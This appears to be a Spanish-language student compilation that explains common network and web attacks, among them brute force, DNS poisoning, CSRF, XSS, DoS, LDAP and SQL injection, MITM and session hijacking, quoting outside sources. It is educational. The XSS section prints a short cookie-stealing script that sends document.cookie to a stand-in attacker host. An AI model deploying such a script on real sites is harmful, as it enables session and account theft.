Tipos de Ataques a La Red

Eduardo Sánchez Piña

TIPOS DE ATAQUES A LA RED

Brute Force (Fuerza Bruta)

Los ataques de fuerza bruta o búsqueda exhaustiva de llaves (exhaustive key search). Estos ataques se basan en algo muy simple: de manera automatizada se van probando cada determinado período de tiempo y en determinados lugares, distintas palabras hasta “adivinar” la contraseña.

Esto tiene origen en prácticas sociales. Hay una gran cantidad de contraseñas coincidentes en la vida de las personas. Por ejemplo, chupetin (sin acento), caramelo o amelie son contraseñas de las más utilizadas, además del famoso 123456, pero las coincidencias de passwords entre las personas son realmente muchas. Esto ha dado origen a colecciones de estas palabras, de estos passwords más comunes, que son utilizados para ataques de fuerza bruta que van combinando términos, alternando palabras, números y símbolos.

Cuando se trata de passwords cortos y simples, del estilo de “caramelo”, estos ataques dan resultados muy rápidamente, pero cuando se trata de contraseñas alfanuméricas (por ejemplo: c4r4M3l0! aunque en esta palabra sólo el “!” aporta seguridad) encontrar una contraseña correcta puede demandar miles de años.

Un ataque de fuerza bruta te puede ayudar, por ejemplo, a recuperar tu email en caso de que hayas olvidado la contraseña y no puedas restablecerla.

Cuando olvidamos la contraseña de nuestro email, del router o alguna cuenta, y no podemos restablecer la contraseña ni recuperarla, utilizar software de fuerza bruta puede hacernos más simple la vida. (Pablo)

Cache Poisoning (Envenenamiento de Cache) y DNS Poisoning (Envenenamiento de DNS)

Ingeniero en computación


El envenenamiento de caché DNS, también conocida como suplantación de DNS, es un tipo de ataque que explota vulnerabilidades en el sistema de nombres de dominio (DNS) para desviar el tráfico de Internet de los servidores confiables, a servidores falsos. Una de las razones de que el envenenamiento DNS es tan peligroso, es porque puede propagarse de servidor DNS a servidor DNS.

¿Cómo Funciona El DNS?

Cada vez que busca el nombre de un dominio, como “hostdime.com.co“, la primer petición se envía al servidor DNS. El servidor DNS responde con una o más direcciones IP en las que el equipo puede llegar a la dirección indicada, en nuestro ejemplo a hostdime.com.co. Su equipo se conecta directamente a esa dirección IP. El DNS convierte direcciones legibles como “google.com” en direcciones IP legibles por el ordenador como “173.194.67.102”.

Almacenamiento En Caché Del DNS

Internet no sólo cuenta con un servidor DNS, ya que sería algo ineficiente. Tu proveedor de servicios de Internet, ejecuta sus propios servidores DNS, esta almacena información de otros servidores DNS. El router de tu hogar funciona como un servidor DNS, que almacena información de los servidores DNS de tu ISP. El equipo tiene una memoria caché de DNS local, por lo que puede hacer referencia rápidamente a las búsquedas de DNS que han sido realizadas con anterioridad, en lugar de realizar una búsqueda de DNS varias veces.

Técnica Envenenamiento Caché De DNS

Una caché DNS puede llegar a ser envenenada si contiene una entrada incorrecta. Por ejemplo, si un atacante obtiene el control de un servidor DNS y cambia alguna de la información que exista en él, por ejemplo, podrían modificar la IP de alguna página en específica y redireccionar la IP a la dirección que desee el atacante. La IP del atacante podría contener algún tipo de sitio web de phishing malicioso.


http://www.hostdime.com.co/blog/wp-content/uploads/ejemplo-cache-dns-local.png


El envenenamiento de DNS también se puede propagar. Por ejemplo, si varios proveedores de servicios de Internet están recibiendo su información de DNS desde un servidor comprometido, las entradas DNS envenenadas, se extenderán a los proveedores de servicios de Internet y luego serán almacenadas en caché. Luego se extenderán a los routers domésticos y las cachés DNS en los equipos, con esto el atacante ya podría asegurar la infección de una gran variedad de usuarios.(Hostdime)

Cross-Site Request Forgery (CSRF) o falsificación de petición en sitios cruzados

La falsificación de petición en sitios cruzados (CSRF) es una vulnerabilidad bastante común en la que se consigue que un usuario lleve a cabo una acción que no pretendía.

Esto puede ocurrir cuando, por ejemplo, el usuario ha iniciado sesión en una de sus webs y hace click sobre un enlace aparentemente inofensivo. Por detrás, la información de su perfil es actualizada y se cambia su correo electrónico con el de un atacante. El atacante ahora puede solicitar un reseteo de contraseña sin que nadie se entere y ha robado la cuenta con éxito. (Laguna, 2012)

Cross-Site Scripting (XSS) o secuencias de comandos en sitios cruzados



Cross-site Scripting (XSS) es una técnica de ataque que fuerza un sitio web a repetir el código ejecutable suministrado por un atacante, el cual se carga en el navegador del usuario. El código normalmente está escrito en HTML/JavaScript, pero también puede extenderse a VBScript, ActiveX, Java, Flash, o cualquier otra tecnología soportada por el navegador.

Cuando un atacante consigue que el navegador de un usuario ejecute su código, el código se ejecutará dentro del contexto de seguridad (o zona) del sitio web. Con este nivel de privilegio, el código tiene la habilidad de leer, modificar y transmitir cualquier dato sensible accesible por el navegador. Un usuario objeto de este ataque podría tener su cuenta secuestrada (robo de cookie), su navegador redirigido a otra dirección, o posiblemente mostrando contenido fraudulento entregado por el sitio web que está visitando. Los ataques de Cross-site Scripting comprometen esencialmente la relación de confianza entre el usuario y el sitio web.

Ejemplo

Ataque persistente

Muchos sitios web hospedan boletines de noticias donde usuarios registrados pueden publicar mensajes. A un usuario registrado comúnmente se le sigue la pista usando una cookie de ID de sesión autorizándole para publicar mensajes. Si un atacante publicó un mensaje conteniendo un javascript hábilmente construido, un usuario leyendo este mensaje podría tener sus cookies y su cuenta comprometidas.

Fragmento de código de robo de cookie:

<SCRIPT>

document.location=

'http://attackerhost.example/cgi-bin/

cookiesteal.cgi?'+document.cookie

</SCRIPT>

(Web Application Security Consortium)



Denial of Service

En un ataque de denegación de servicio (DoS), un atacante intenta evitar que los usuarios legítimos tengan acceso a información o servicios. Al dirigirse a su ordenador y su conexión a la red, o las computadoras y la red de los sitios que usted está tratando de usar, un atacante puede ser capaz de impedirle el acceso a correo electrónico, sitios web, cuentas en línea (banca, etc.), u otros servicios que confiar en el ordenador afectado.

El tipo más común y obvia de ataque DoS ocurre cuando un atacante "inundaciones" una red con información. Cuando escribe una dirección URL de un sitio web en particular en su navegador, usted está enviando una solicitud al servidor de la computadora de ese sitio para ver la página. El servidor sólo puede procesar una cierta cantidad de solicitudes a la vez, por lo que si un atacante sobrecarga el servidor con solicitudes, no puede procesar su solicitud. Se trata de una "denegación de servicio" porque no se puede acceder a ese sitio.

Un atacante puede utilizar mensajes de correo electrónico de spam para lanzar un ataque similar en su cuenta de correo electrónico. Si usted tiene una cuenta de correo electrónico proporcionada por su empleador o una disponible a través de un servicio gratuito como Yahoo o Hotmail, se le asignó una cuota específica, lo que limita la cantidad de datos que puede tener en su cuenta en cualquier momento dado. Mediante el envío de muchos, o grandes mensajes, correo electrónico a la cuenta, un atacante puede consumir su cuota, lo que impide la recepción de mensajes legítimos. (McDowell, 2013)

LDAP injection



Lightweight Directory Access Protocol (LDAP) Inyección es un ataque utilizada para explotar las aplicaciones basadas en web que construyen sentencias LDAP basado en la entrada del usuario. Cuando una aplicación falla para desinfectar adecuadamente la entrada del usuario, es posible modificar las declaraciones LDAP usando un proxy local. Esto podría resultar en la ejecución de comandos arbitrarios, tales como la concesión de permisos a las consultas no autorizadas, y la modificación de contenido dentro del árbol LDAP. Las mismas técnicas de explotación avanzadas disponibles en SQL Injection se pueden aplicar de manera similar en inyección LDAP. (DuPaul)

Man-in-the-middle

Un ataque man-in-the-middle es un tipo de ataque cibernético, donde actor malicioso le inserta / a sí misma en una conversación entre dos partes, suplanta ambos partidos y accede a la información de que las dos partes estaban tratando de enviar a la otra. Un ataque man-in-the-middle permite actor malicioso para interceptar, enviar y recibir datos destinados a otra persona, o no destinado a ser enviado a todos, sin ninguna de las partes fuera de saber hasta que sea demasiado tarde. Man-in-the-middle ataques pueden ser abreviados de muchas maneras, incluyendo MITM, MitM, MiM o MIM.

Conceptos clave de un ataque Man-in-the-Middle

Man-in-the-middle es un tipo de ataque de espionaje que se produce cuando un actor de malicioso inserta a sí mismo como un relé / apoderado en una sesión de comunicación entre las personas o sistemas.

Un ataque MITM explota el procesamiento en tiempo real de las transacciones, conversaciones o transferencia de otros datos.

Man-in-the-middle ataques permiten a los atacantes intercepten, enviar y recibir datos nunca la intención de ser para ellos sin ninguna de las partes fuera de saber hasta que sea demasiado tarde.

Man-in-the-Middle Ejemplos Ataque



En la imagen de arriba, te darás cuenta de que el atacante inserta él / ella misma en el medio del flujo de tráfico entre el cliente y el servidor. Ahora que el atacante ha inmiscuido en la comunicación entre los dos puntos finales, él / ella puede inyectar datos falsos e interceptar los datos transferidos entre ellos.

A continuación se muestra otro ejemplo de lo que podría suceder una vez que el hombre en el medio ha insertado él / ella misma.

El pirata informático se hace pasar por ambos lados de la conversación para tener acceso a los fondos. Este ejemplo es válido para una conversación con un cliente y servidor, así como conversaciones de persona a persona. En el ejemplo anterior, el atacante intercepta una clave pública y con eso puede incorporar sus propias credenciales para engañar a la gente en ambos extremos en la creencia de que están hablando el uno al otro de forma segura.

Interacciones susceptibles a los ataques MITM

Sitios financieros - entre sesión y autenticación



Conexiones destinados a ser asegurados por las claves públicas o privadas Otros sitios que requieren conexiones - donde hay algo que ganar por tener acceso

(DuPaul)

Session hijacking attack

Tipos de Sesión Secuestro:

Activo Secuestro de sesiones

Secuestro de sesión activa implica el secuestro de una sesión ya autenticado. Activo Secuestro Sesión significa que el usuario original ha iniciado sesión en su cuenta o

perfil y luego atacante robar las cookies para secuestrar la sesión activa y después desconecte el usuario original del servidor.

TRABAJO:

En Active Secuestro de sesiones, los atacantes utilizan secuencias de comandos del lado del cliente para robar las cookies de los usuarios originales mediante la participación de las tácticas de ingeniería social que incluye correos electrónicos, mensajería privada en los foros y en otros sitios web de redes sociales.

¿Por qué lo llamamos secuestro de sesión activa porque los atacantes necesitan interactuar y necesitan algunas acciones a realizar por la víctima para robar la sesión de éxito que puede elevar el nivel de sospecha?

Pasivo Sesión Secuestro:

En pasivas atacantes secuestro de sesión no secuestrar sesión activa en vez capturan las credenciales de inicio de sesión mientras el usuario original está tratando de establecer una nueva conexión con el servidor, y el atacante está sentado en silencio en la misma red y el registro de las credenciales de inicio de sesión.



TRABAJO:

Pasivo Sesión secuestro implica el uso de herramientas de red sniffing que captura de paquetes de datos y explotar la vulnerabilidad de protocolo ARP envenenando la red. Los atacantes analizan los datos capturados para recuperar datos de acceso del usuario.

¿Por qué lo llamamos pasiva secuestro de sesión porque los atacantes no necesita para interactuar con el usuario y hacer que se realice cualquier acción específica? Hay menos riesgo de nivel de sospecha.

Sesión TCP Secuestro:

TCP secuestro es el tipo más antiguo de secuestro de sesión. TCP secuestro de sesión se ocupa en realidad con la predicción exitosa de los números de secuencia iniciales que consigue intercambiados entre dos host. Un cliente y el servidor.

Números de secuencia se intercambian durante la conexión TCP de tres vías apretón de manos.

Host A envía un SYN conjunto de bits de paquete al host B para crear una nueva conexión. Host B responderá con los bits SYN / ACK establecidos paquete al host A con un número

de secuencia inicial. Host A responderá con ACK bit igual paquete al host B con número de secuencia inicial + 1

Así pues, si los atacantes logran predecir el número de secuencia inicial entonces pueden realmente enviar el último paquete de datos ACK al servidor, spoofing como host original. Entonces pueden secuestrar la conexión TCP.

SQL Injection: inyección SQL

Inyección SQL es una técnica de inyección de código que explota una vulnerabilidad de seguridad que ocurre en la capa de base de datos de una aplicación. La vulnerabilidad está presente cuando la entrada del usuario es o incorrectamente filtra para caracteres de escape literales de cadena incrustados en sentencias SQL o la entrada del usuario no es inflexible y con ello ejecutado de forma inesperada. Es una instancia de una clase más general de las vulnerabilidades que puede ocurrir cada vez que un lenguaje de programación o de scripting está incrustado dentro de otro.

Inyección de SQL se utiliza para Hackear Aplicaciones Web.

¿Cómo funciona?

El usuario hará aportaciones a la aplicación Web. Esto podría ser a través de un formulario HTML (POST). O un Dinámicamente Crafted Link (GET).

La aplicación Web aceptará los datos de los usuarios y la procesan en la consulta SQL según la secuencia de comandos Web.



El servidor Web generará una salida para el usuario, en función de la secuencia de comandos.

Por ejemplo, Entramos nuestros Credenciales Iniciar sesión en un formulario de acceso y pulse Enviar. El servidor toma la Detalles y cheques contra su base de datos del usuario. Si autenticado, se le llevará a la página deseada.

Durante SQL Injection, el Usuario se presentará entrada malicioso que obliguen a la consulta (que está dirigido por el inicio de sesión en el back-end) para llevar a cabo una acción no deseada.

¿Qué puede resultar en?

El uso no autorizado de aplicación Web. Inyección SQL común puede resultar en pasar de autenticación de usuario

Dependiendo de los permisos de base de datos, también puede:

Introducir datos en la base de datos. Datos recuperados de la base de datos usando SQLI. Los datos aún se pueden eliminar.

Aparte de esto, uno también puede:

Detener / Apagar el servidor SQL Server Obtenga una Shell Web

(Saxena, 2014)


Tipos de Ataques a La Red

Documents

Transcript of Tipos de Ataques a La Red